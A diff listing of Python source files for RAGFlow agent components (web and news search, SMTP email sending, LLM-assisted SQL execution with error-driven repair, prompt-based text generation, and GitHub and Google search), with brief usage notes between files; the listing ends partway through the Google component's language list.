+ Define the DuckDuckGo component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.top_n = 10
31
+ self.channel = "text"
32
+
33
+ def check(self):
34
+ self.check_positive_integer(self.top_n, "Top N")
35
+ self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])
36
+
37
+
38
+ class DuckDuckGo(ComponentBase, ABC):
39
+ component_name = "DuckDuckGo"
40
+
41
+ def _run(self, history, **kwargs):
42
+ ans = self.get_input()
43
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
44
+ if not ans:
45
+ return DuckDuckGo.be_output("")
46
+
47
+ try:
48
+ if self._param.channel == "text":
49
+ with DDGS() as ddgs:
50
+ # {'title': '', 'href': '', 'body': ''}
51
+ duck_res = [{"content": '<a href="' + i["href"] + '">' + i["title"] + '</a> ' + i["body"]} for i
52
+ in ddgs.text(ans, max_results=self._param.top_n)]
53
+ elif self._param.channel == "news":
54
+ with DDGS() as ddgs:
55
+ # {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
56
+ duck_res = [{"content": '<a href="' + i["url"] + '">' + i["title"] + '</a> ' + i["body"]} for i
57
+ in ddgs.news(ans, max_results=self._param.top_n)]
58
+ except Exception as e:
59
+ return DuckDuckGo.be_output("**ERROR**: " + str(e))
60
+
61
+ if not duck_res:
62
+ return DuckDuckGo.be_output("")
63
+
64
+ df = pd.DataFrame(duck_res)
65
+ logging.debug(f"df: {df}")
66
+ return df
ragflow-main/agent/component/email.py ADDED
@@ -0,0 +1,138 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+
17
+ from abc import ABC
18
+ import json
19
+ import smtplib
20
+ import logging
21
+ from email.mime.text import MIMEText
22
+ from email.mime.multipart import MIMEMultipart
23
+ from email.header import Header
24
+ from email.utils import formataddr
25
+ from agent.component.base import ComponentBase, ComponentParamBase
26
+
27
+ class EmailParam(ComponentParamBase):
28
+ """
29
+ Define the Email component parameters.
30
+ """
31
+ def __init__(self):
32
+ super().__init__()
33
+ # Fixed configuration parameters
34
+ self.smtp_server = "" # SMTP server address
35
+ self.smtp_port = 465 # SMTP port
36
+ self.email = "" # Sender email
37
+ self.password = "" # Email authorization code
38
+ self.sender_name = "" # Sender name
39
+
40
+ def check(self):
41
+ # Check required parameters
42
+ self.check_empty(self.smtp_server, "SMTP Server")
43
+ self.check_empty(self.email, "Email")
44
+ self.check_empty(self.password, "Password")
45
+ self.check_empty(self.sender_name, "Sender Name")
46
+
47
+ class Email(ComponentBase, ABC):
48
+ component_name = "Email"
49
+
50
+ def _run(self, history, **kwargs):
51
+ # Get upstream component output and parse JSON
52
+ ans = self.get_input()
53
+ content = "".join(ans["content"]) if "content" in ans else ""
54
+ if not content:
55
+ return Email.be_output("No content to send")
56
+
57
+ success = False
58
+ try:
59
+ # Parse JSON string passed from upstream
60
+ email_data = json.loads(content)
61
+
62
+ # Validate required fields
63
+ if "to_email" not in email_data:
64
+ return Email.be_output("Missing required field: to_email")
65
+
66
+ # Create email object
67
+ msg = MIMEMultipart('alternative')
68
+
69
+ # Properly handle sender name encoding
70
+ msg['From'] = formataddr((str(Header(self._param.sender_name,'utf-8')), self._param.email))
71
+ msg['To'] = email_data["to_email"]
72
+ if "cc_email" in email_data and email_data["cc_email"]:
73
+ msg['Cc'] = email_data["cc_email"]
74
+ msg['Subject'] = Header(email_data.get("subject", "No Subject"), 'utf-8').encode()
75
+
76
+ # Use content from email_data or default content
77
+ email_content = email_data.get("content", "No content provided")
78
+ # msg.attach(MIMEText(email_content, 'plain', 'utf-8'))
79
+ msg.attach(MIMEText(email_content, 'html', 'utf-8'))
80
+
81
+ # Connect to SMTP server and send
82
+ logging.info(f"Connecting to SMTP server {self._param.smtp_server}:{self._param.smtp_port}")
83
+
84
+ context = smtplib.ssl.create_default_context()
85
+ with smtplib.SMTP_SSL(self._param.smtp_server, self._param.smtp_port, context=context) as server:
86
+ # Login
87
+ logging.info(f"Attempting to login with email: {self._param.email}")
88
+ server.login(self._param.email, self._param.password)
89
+
90
+ # Get all recipient list
91
+ recipients = [email_data["to_email"]]
92
+ if "cc_email" in email_data and email_data["cc_email"]:
93
+ recipients.extend(email_data["cc_email"].split(','))
94
+
95
+ # Send email
96
+ logging.info(f"Sending email to recipients: {recipients}")
97
+ try:
98
+ server.send_message(msg, self._param.email, recipients)
99
+ success = True
100
+ except Exception as e:
101
+ logging.error(f"Error during send_message: {str(e)}")
102
+ # Try alternative method
103
+ server.sendmail(self._param.email, recipients, msg.as_string())
104
+ success = True
105
+
106
+ try:
107
+ server.quit()
108
+ except Exception as e:
109
+ # Ignore errors when closing connection
110
+ logging.warning(f"Non-fatal error during connection close: {str(e)}")
111
+
112
+ if success:
113
+ return Email.be_output("Email sent successfully")
114
+
115
+ except json.JSONDecodeError:
116
+ error_msg = "Invalid JSON format in input"
117
+ logging.error(error_msg)
118
+ return Email.be_output(error_msg)
119
+
120
+ except smtplib.SMTPAuthenticationError:
121
+ error_msg = "SMTP Authentication failed. Please check your email and authorization code."
122
+ logging.error(error_msg)
123
+ return Email.be_output(f"Failed to send email: {error_msg}")
124
+
125
+ except smtplib.SMTPConnectError:
126
+ error_msg = f"Failed to connect to SMTP server {self._param.smtp_server}:{self._param.smtp_port}"
127
+ logging.error(error_msg)
128
+ return Email.be_output(f"Failed to send email: {error_msg}")
129
+
130
+ except smtplib.SMTPException as e:
131
+ error_msg = f"SMTP error occurred: {str(e)}"
132
+ logging.error(error_msg)
133
+ return Email.be_output(f"Failed to send email: {error_msg}")
134
+
135
+ except Exception as e:
136
+ error_msg = f"Unexpected error: {str(e)}"
137
+ logging.error(error_msg)
138
+ return Email.be_output(f"Failed to send email: {error_msg}")
ragflow-main/agent/component/exesql.py ADDED
@@ -0,0 +1,155 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ import re
18
+ from copy import deepcopy
19
+
20
+ import pandas as pd
21
+ import pymysql
22
+ import psycopg2
23
+ from agent.component import GenerateParam, Generate
24
+ import pyodbc
25
+ import logging
26
+
27
+
28
+ class ExeSQLParam(GenerateParam):
29
+ """
30
+ Define the ExeSQL component parameters.
31
+ """
32
+
33
+ def __init__(self):
34
+ super().__init__()
35
+ self.db_type = "mysql"
36
+ self.database = ""
37
+ self.username = ""
38
+ self.host = ""
39
+ self.port = 3306
40
+ self.password = ""
41
+ self.loop = 3
42
+ self.top_n = 30
43
+
44
+ def check(self):
45
+ super().check()
46
+ self.check_valid_value(self.db_type, "Choose DB type", ['mysql', 'postgresql', 'mariadb', 'mssql'])
47
+ self.check_empty(self.database, "Database name")
48
+ self.check_empty(self.username, "database username")
49
+ self.check_empty(self.host, "IP Address")
50
+ self.check_positive_integer(self.port, "IP Port")
51
+ self.check_empty(self.password, "Database password")
52
+ self.check_positive_integer(self.top_n, "Number of records")
53
+ if self.database == "rag_flow":
54
+ if self.host == "ragflow-mysql":
55
+ raise ValueError("The host is not accessible.")
56
+ if self.password == "infini_rag_flow":
57
+ raise ValueError("The host is not accessible.")
58
+
59
+
60
+ class ExeSQL(Generate, ABC):
61
+ component_name = "ExeSQL"
62
+
63
+ def _refactor(self,ans):
64
+ match = re.search(r"```sql\s*(.*?)\s*```", ans, re.DOTALL)
65
+ if match:
66
+ ans = match.group(1) # Query content
67
+ return ans
68
+ else:
69
+ print("no markdown")
70
+ ans = re.sub(r'^.*?SELECT ', 'SELECT ', (ans), flags=re.IGNORECASE)
71
+ ans = re.sub(r';.*?SELECT ', '; SELECT ', ans, flags=re.IGNORECASE)
72
+ ans = re.sub(r';[^;]*$', r';', ans)
73
+ if not ans:
74
+ raise Exception("SQL statement not found!")
75
+ return ans
76
+
77
+ def _run(self, history, **kwargs):
78
+ ans = self.get_input()
79
+ ans = "".join([str(a) for a in ans["content"]]) if "content" in ans else ""
80
+ ans = self._refactor(ans)
81
+ logging.info("db_type: ",self._param.db_type)
82
+ if self._param.db_type in ["mysql", "mariadb"]:
83
+ db = pymysql.connect(db=self._param.database, user=self._param.username, host=self._param.host,
84
+ port=self._param.port, password=self._param.password)
85
+ elif self._param.db_type == 'postgresql':
86
+ db = psycopg2.connect(dbname=self._param.database, user=self._param.username, host=self._param.host,
87
+ port=self._param.port, password=self._param.password)
88
+ elif self._param.db_type == 'mssql':
89
+ conn_str = (
90
+ r'DRIVER={ODBC Driver 17 for SQL Server};'
91
+ r'SERVER=' + self._param.host + ',' + str(self._param.port) + ';'
92
+ r'DATABASE=' + self._param.database + ';'
93
+ r'UID=' + self._param.username + ';'
94
+ r'PWD=' + self._param.password
95
+ )
96
+ db = pyodbc.connect(conn_str)
97
+ try:
98
+ cursor = db.cursor()
99
+ except Exception as e:
100
+ raise Exception("Database Connection Failed! \n" + str(e))
101
+ if not hasattr(self, "_loop"):
102
+ setattr(self, "_loop", 0)
103
+ self._loop += 1
104
+ input_list=re.split(r';', ans.replace(r"\n", " "))
105
+ sql_res = []
106
+ for i in range(len(input_list)):
107
+ single_sql=input_list[i]
108
+ while self._loop <= self._param.loop:
109
+ self._loop+=1
110
+ if not single_sql:
111
+ break
112
+ try:
113
+ logging.info("single_sql: ", single_sql)
114
+ cursor.execute(single_sql)
115
+ if cursor.rowcount == 0:
116
+ sql_res.append({"content": "No record in the database!"})
117
+ break
118
+ if self._param.db_type == 'mssql':
119
+ single_res = pd.DataFrame.from_records(cursor.fetchmany(self._param.top_n),columns = [desc[0] for desc in cursor.description])
120
+ else:
121
+ single_res = pd.DataFrame([i for i in cursor.fetchmany(self._param.top_n)])
122
+ single_res.columns = [i[0] for i in cursor.description]
123
+ sql_res.append({"content": single_res.to_markdown()})
124
+ break
125
+ except Exception as e:
126
+ single_sql = self._regenerate_sql(single_sql, str(e), **kwargs)
127
+ single_sql = self._refactor(single_sql)
128
+ if self._loop > self._param.loop:
129
+ sql_res.append({"content": "Can't query the correct data via SQL statement."})
130
+ # raise Exception("Maximum loop time exceeds. Can't query the correct data via SQL statement.")
131
+ db.close()
132
+ if not sql_res:
133
+ return ExeSQL.be_output("")
134
+ return pd.DataFrame(sql_res)
135
+
136
+ def _regenerate_sql(self, failed_sql, error_message,**kwargs):
137
+ prompt = f'''
138
+ ## You are the Repair SQL Statement Helper, please modify the original SQL statement based on the SQL query error report.
139
+ ## The original SQL statement is as follows:{failed_sql}.
140
+ ## The contents of the SQL query error report is as follows:{error_message}.
141
+ ## Answer only the modified SQL statement. Please do not give any explanation, just answer the code.
142
+ '''
143
+ self._param.prompt=prompt
144
+ kwargs_ = deepcopy(kwargs)
145
+ kwargs_["stream"] = False
146
+ response = Generate._run(self, [], **kwargs_)
147
+ try:
148
+ regenerated_sql = response.loc[0,"content"]
149
+ return regenerated_sql
150
+ except Exception as e:
151
+ logging.error(f"Failed to regenerate SQL: {e}")
152
+ return None
153
+
154
+ def debug(self, **kwargs):
155
+ return self._run([], **kwargs)
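
For clarity, _refactor above first looks for a fenced ```sql block in the LLM answer and otherwise strips everything before the first SELECT and after the last semicolon; a small sketch of both answer shapes it can handle (example strings only):

# Illustrative LLM answers that ExeSQL._refactor can reduce to plain SQL.
fenced_answer = (
    "Here is the query you asked for:\n"
    "```sql\n"
    "SELECT id, name FROM users WHERE active = 1;\n"
    "```"
)

# Without a markdown block, leading chatter before SELECT and trailing text
# after the final semicolon are removed.
plain_answer = "Sure! SELECT id, name FROM users WHERE active = 1; Hope this helps."
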
ragflow-main/agent/component/generate.py ADDED
@@ -0,0 +1,247 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import re
17
+ from functools import partial
18
+ import pandas as pd
19
+ from api.db import LLMType
20
+ from api.db.services.conversation_service import structure_answer
21
+ from api.db.services.dialog_service import message_fit_in
22
+ from api.db.services.llm_service import LLMBundle
23
+ from api import settings
24
+ from agent.component.base import ComponentBase, ComponentParamBase
25
+
26
+
27
+ class GenerateParam(ComponentParamBase):
28
+ """
29
+ Define the Generate component parameters.
30
+ """
31
+
32
+ def __init__(self):
33
+ super().__init__()
34
+ self.llm_id = ""
35
+ self.prompt = ""
36
+ self.max_tokens = 0
37
+ self.temperature = 0
38
+ self.top_p = 0
39
+ self.presence_penalty = 0
40
+ self.frequency_penalty = 0
41
+ self.cite = True
42
+ self.parameters = []
43
+
44
+ def check(self):
45
+ self.check_decimal_float(self.temperature, "[Generate] Temperature")
46
+ self.check_decimal_float(self.presence_penalty, "[Generate] Presence penalty")
47
+ self.check_decimal_float(self.frequency_penalty, "[Generate] Frequency penalty")
48
+ self.check_nonnegative_number(self.max_tokens, "[Generate] Max tokens")
49
+ self.check_decimal_float(self.top_p, "[Generate] Top P")
50
+ self.check_empty(self.llm_id, "[Generate] LLM")
51
+ # self.check_defined_type(self.parameters, "Parameters", ["list"])
52
+
53
+ def gen_conf(self):
54
+ conf = {}
55
+ if self.max_tokens > 0:
56
+ conf["max_tokens"] = self.max_tokens
57
+ if self.temperature > 0:
58
+ conf["temperature"] = self.temperature
59
+ if self.top_p > 0:
60
+ conf["top_p"] = self.top_p
61
+ if self.presence_penalty > 0:
62
+ conf["presence_penalty"] = self.presence_penalty
63
+ if self.frequency_penalty > 0:
64
+ conf["frequency_penalty"] = self.frequency_penalty
65
+ return conf
66
+
67
+
68
+ class Generate(ComponentBase):
69
+ component_name = "Generate"
70
+
71
+ def get_dependent_components(self):
72
+ inputs = self.get_input_elements()
73
+ cpnts = set([i["key"] for i in inputs[1:] if i["key"].lower().find("answer") < 0 and i["key"].lower().find("begin") < 0])
74
+ return list(cpnts)
75
+
76
+ def set_cite(self, retrieval_res, answer):
77
+ retrieval_res = retrieval_res.dropna(subset=["vector", "content_ltks"]).reset_index(drop=True)
78
+ if "empty_response" in retrieval_res.columns:
79
+ retrieval_res["empty_response"].fillna("", inplace=True)
80
+ answer, idx = settings.retrievaler.insert_citations(answer,
81
+ [ck["content_ltks"] for _, ck in retrieval_res.iterrows()],
82
+ [ck["vector"] for _, ck in retrieval_res.iterrows()],
83
+ LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
84
+ self._canvas.get_embedding_model()), tkweight=0.7,
85
+ vtweight=0.3)
86
+ doc_ids = set([])
87
+ recall_docs = []
88
+ for i in idx:
89
+ did = retrieval_res.loc[int(i), "doc_id"]
90
+ if did in doc_ids:
91
+ continue
92
+ doc_ids.add(did)
93
+ recall_docs.append({"doc_id": did, "doc_name": retrieval_res.loc[int(i), "docnm_kwd"]})
94
+
95
+ del retrieval_res["vector"]
96
+ del retrieval_res["content_ltks"]
97
+
98
+ reference = {
99
+ "chunks": [ck.to_dict() for _, ck in retrieval_res.iterrows()],
100
+ "doc_aggs": recall_docs
101
+ }
102
+
103
+ if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
104
+ answer += " Please set LLM API-Key in 'User Setting -> Model providers -> API-Key'"
105
+ res = {"content": answer, "reference": reference}
106
+ res = structure_answer(None, res, "", "")
107
+
108
+ return res
109
+
110
+ def get_input_elements(self):
111
+ key_set = set([])
112
+ res = [{"key": "user", "name": "Input your question here:"}]
113
+ for r in re.finditer(r"\{([a-z]+[:@][a-z0-9_-]+)\}", self._param.prompt, flags=re.IGNORECASE):
114
+ cpn_id = r.group(1)
115
+ if cpn_id in key_set:
116
+ continue
117
+ if cpn_id.lower().find("begin@") == 0:
118
+ cpn_id, key = cpn_id.split("@")
119
+ for p in self._canvas.get_component(cpn_id)["obj"]._param.query:
120
+ if p["key"] != key:
121
+ continue
122
+ res.append({"key": r.group(1), "name": p["name"]})
123
+ key_set.add(r.group(1))
124
+ continue
125
+ cpn_nm = self._canvas.get_compnent_name(cpn_id)
126
+ if not cpn_nm:
127
+ continue
128
+ res.append({"key": cpn_id, "name": cpn_nm})
129
+ key_set.add(cpn_id)
130
+ return res
131
+
132
+ def _run(self, history, **kwargs):
133
+ chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
134
+ prompt = self._param.prompt
135
+
136
+ retrieval_res = []
137
+ self._param.inputs = []
138
+ for para in self.get_input_elements()[1:]:
139
+ if para["key"].lower().find("begin@") == 0:
140
+ cpn_id, key = para["key"].split("@")
141
+ for p in self._canvas.get_component(cpn_id)["obj"]._param.query:
142
+ if p["key"] == key:
143
+ kwargs[para["key"]] = p.get("value", "")
144
+ self._param.inputs.append(
145
+ {"component_id": para["key"], "content": kwargs[para["key"]]})
146
+ break
147
+ else:
148
+ assert False, f"Can't find parameter '{key}' for {cpn_id}"
149
+ continue
150
+
151
+ component_id = para["key"]
152
+ cpn = self._canvas.get_component(component_id)["obj"]
153
+ if cpn.component_name.lower() == "answer":
154
+ hist = self._canvas.get_history(1)
155
+ if hist:
156
+ hist = hist[0]["content"]
157
+ else:
158
+ hist = ""
159
+ kwargs[para["key"]] = hist
160
+ continue
161
+ _, out = cpn.output(allow_partial=False)
162
+ if "content" not in out.columns:
163
+ kwargs[para["key"]] = ""
164
+ else:
165
+ if cpn.component_name.lower() == "retrieval":
166
+ retrieval_res.append(out)
167
+ kwargs[para["key"]] = " - " + "\n - ".join([o if isinstance(o, str) else str(o) for o in out["content"]])
168
+ self._param.inputs.append({"component_id": para["key"], "content": kwargs[para["key"]]})
169
+
170
+ if retrieval_res:
171
+ retrieval_res = pd.concat(retrieval_res, ignore_index=True)
172
+ else:
173
+ retrieval_res = pd.DataFrame([])
174
+
175
+ for n, v in kwargs.items():
176
+ prompt = re.sub(r"\{%s\}" % re.escape(n), str(v).replace("\\", " "), prompt)
177
+
178
+ if not self._param.inputs and prompt.find("{input}") >= 0:
179
+ retrieval_res = self.get_input()
180
+ input = (" - " + "\n - ".join(
181
+ [c for c in retrieval_res["content"] if isinstance(c, str)])) if "content" in retrieval_res else ""
182
+ prompt = re.sub(r"\{input\}", re.escape(input), prompt)
183
+
184
+ downstreams = self._canvas.get_component(self._id)["downstream"]
185
+ if kwargs.get("stream") and len(downstreams) == 1 and self._canvas.get_component(downstreams[0])[
186
+ "obj"].component_name.lower() == "answer":
187
+ return partial(self.stream_output, chat_mdl, prompt, retrieval_res)
188
+
189
+ if "empty_response" in retrieval_res.columns and not "".join(retrieval_res["content"]):
190
+ empty_res = "\n- ".join([str(t) for t in retrieval_res["empty_response"] if str(t)])
191
+ res = {"content": empty_res if empty_res else "Nothing found in knowledgebase!", "reference": []}
192
+ return pd.DataFrame([res])
193
+
194
+ msg = self._canvas.get_history(self._param.message_history_window_size)
195
+ if len(msg) < 1:
196
+ msg.append({"role": "user", "content": "Output: "})
197
+ _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(chat_mdl.max_length * 0.97))
198
+ if len(msg) < 2:
199
+ msg.append({"role": "user", "content": "Output: "})
200
+ ans = chat_mdl.chat(msg[0]["content"], msg[1:], self._param.gen_conf())
201
+
202
+ if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
203
+ res = self.set_cite(retrieval_res, ans)
204
+ return pd.DataFrame([res])
205
+
206
+ return Generate.be_output(ans)
207
+
208
+ def stream_output(self, chat_mdl, prompt, retrieval_res):
209
+ res = None
210
+ if "empty_response" in retrieval_res.columns and not "".join(retrieval_res["content"]):
211
+ empty_res = "\n- ".join([str(t) for t in retrieval_res["empty_response"] if str(t)])
212
+ res = {"content": empty_res if empty_res else "Nothing found in knowledgebase!", "reference": []}
213
+ yield res
214
+ self.set_output(res)
215
+ return
216
+
217
+ msg = self._canvas.get_history(self._param.message_history_window_size)
218
+ if len(msg) < 1:
219
+ msg.append({"role": "user", "content": "Output: "})
220
+ _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(chat_mdl.max_length * 0.97))
221
+ if len(msg) < 2:
222
+ msg.append({"role": "user", "content": "Output: "})
223
+ answer = ""
224
+ for ans in chat_mdl.chat_streamly(msg[0]["content"], msg[1:], self._param.gen_conf()):
225
+ res = {"content": ans, "reference": []}
226
+ answer = ans
227
+ yield res
228
+
229
+ if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
230
+ res = self.set_cite(retrieval_res, answer)
231
+ yield res
232
+
233
+ self.set_output(Generate.be_output(res))
234
+
235
+ def debug(self, **kwargs):
236
+ chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
237
+ prompt = self._param.prompt
238
+
239
+ for para in self._param.debug_inputs:
240
+ kwargs[para["key"]] = para.get("value", "")
241
+
242
+ for n, v in kwargs.items():
243
+ prompt = re.sub(r"\{%s\}" % re.escape(n), str(v).replace("\\", " "), prompt)
244
+
245
+ u = kwargs.get("user")
246
+ ans = chat_mdl.chat(prompt, [{"role": "user", "content": u if u else "Output: "}], self._param.gen_conf())
247
+ return pd.DataFrame([ans])
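
As a usage note, the Generate component resolves prompt placeholders of the form {component_id} or {begin@parameter_key}; a small illustrative prompt (the IDs below are placeholders):

# Hypothetical prompt for the Generate component. "Retrieval:0" and
# "begin@customer_name" are placeholder IDs; at run time each {...} slot is
# filled with the referenced component's output or Begin parameter value.
prompt = (
    "You are a helpful assistant for {begin@customer_name}.\n"
    "Answer the question using only the passages below:\n"
    "{Retrieval:0}\n"
)
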
ragflow-main/agent/component/github.py ADDED
@@ -0,0 +1,61 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import pandas as pd
19
+ import requests
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+
23
+ class GitHubParam(ComponentParamBase):
24
+ """
25
+ Define the GitHub component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.top_n = 10
31
+
32
+ def check(self):
33
+ self.check_positive_integer(self.top_n, "Top N")
34
+
35
+
36
+ class GitHub(ComponentBase, ABC):
37
+ component_name = "GitHub"
38
+
39
+ def _run(self, history, **kwargs):
40
+ ans = self.get_input()
41
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
42
+ if not ans:
43
+ return GitHub.be_output("")
44
+
45
+ try:
46
+ url = 'https://api.github.com/search/repositories?q=' + ans + '&sort=stars&order=desc&per_page=' + str(
47
+ self._param.top_n)
48
+ headers = {"Content-Type": "application/vnd.github+json", "X-GitHub-Api-Version": '2022-11-28'}
49
+ response = requests.get(url=url, headers=headers).json()
50
+
51
+ github_res = [{"content": '<a href="' + i["html_url"] + '">' + i["name"] + '</a>' + str(
52
+ i["description"]) + '\n stars:' + str(i['watchers'])} for i in response['items']]
53
+ except Exception as e:
54
+ return GitHub.be_output("**ERROR**: " + str(e))
55
+
56
+ if not github_res:
57
+ return GitHub.be_output("")
58
+
59
+ df = pd.DataFrame(github_res)
60
+ logging.debug(f"df: {df}")
61
+ return df
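
For reference, the request above uses GitHub's public repository search API; a minimal standalone sketch (the query is a placeholder, and unauthenticated requests are rate-limited):

# Standalone sketch of the repository search performed by the GitHub component;
# "ragflow" is an example query.
import requests

resp = requests.get(
    "https://api.github.com/search/repositories",
    params={"q": "ragflow", "sort": "stars", "order": "desc", "per_page": 10},
    headers={"Accept": "application/vnd.github+json", "X-GitHub-Api-Version": "2022-11-28"},
    timeout=30,
)
for repo in resp.json().get("items", []):
    print(repo["full_name"], repo["stargazers_count"])
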
ragflow-main/agent/component/google.py ADDED
@@ -0,0 +1,96 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ from serpapi import GoogleSearch
19
+ import pandas as pd
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+
23
+ class GoogleParam(ComponentParamBase):
24
+ """
25
+ Define the Google component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.top_n = 10
31
+ self.api_key = "xxx"
32
+ self.country = "cn"
33
+ self.language = "en"
34
+
35
+ def check(self):
36
+ self.check_positive_integer(self.top_n, "Top N")
37
+ self.check_empty(self.api_key, "SerpApi API key")
38
+ self.check_valid_value(self.country, "Google Country",
39
+ ['af', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at',
40
+ 'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'ba', 'bw',
41
+ 'bv', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'kh', 'cm', 'ca', 'cv', 'ky', 'cf', 'td',
42
+ 'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cg', 'cd', 'ck', 'cr', 'ci', 'hr', 'cu', 'cy',
43
+ 'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'et', 'fk', 'fo',
44
+ 'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl',
45
+ 'gd', 'gp', 'gu', 'gt', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is',
46
+ 'in', 'id', 'ir', 'iq', 'ie', 'il', 'it', 'jm', 'jp', 'jo', 'kz', 'ke', 'ki', 'kp',
47
+ 'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk',
48
+ 'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md',
49
+ 'mc', 'mn', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'an', 'nc', 'nz', 'ni',
50
+ 'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe',
51
+ 'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'sh', 'kn', 'lc', 'pm',
52
+ 'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sk', 'si', 'sb', 'so',
53
+ 'za', 'gs', 'es', 'lk', 'sd', 'sr', 'sj', 'sz', 'se', 'ch', 'sy', 'tw', 'tj', 'tz',
54
+ 'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae',
55
+ 'uk', 'gb', 'us', 'um', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'eh', 'ye',
56
+ 'zm', 'zw'])
57
+ self.check_valid_value(self.language, "Google languages",
58
+ ['af', 'ak', 'sq', 'ws', 'am', 'ar', 'hy', 'az', 'eu', 'be', 'bem', 'bn', 'bh',
59
+ 'xx-bork', 'bs', 'br', 'bg', 'bt', 'km', 'ca', 'chr', 'ny', 'zh-cn', 'zh-tw', 'co',
60
+ 'hr', 'cs', 'da', 'nl', 'xx-elmer', 'en', 'eo', 'et', 'ee', 'fo', 'tl', 'fi', 'fr',
61
+ 'fy', 'gaa', 'gl', 'ka', 'de', 'el', 'kl', 'gn', 'gu', 'xx-hacker', 'ht', 'ha', 'haw',
62
+ 'iw', 'hi', 'hu', 'is', 'ig', 'id', 'ia', 'ga', 'it', 'ja', 'jw', 'kn', 'kk', 'rw',
63
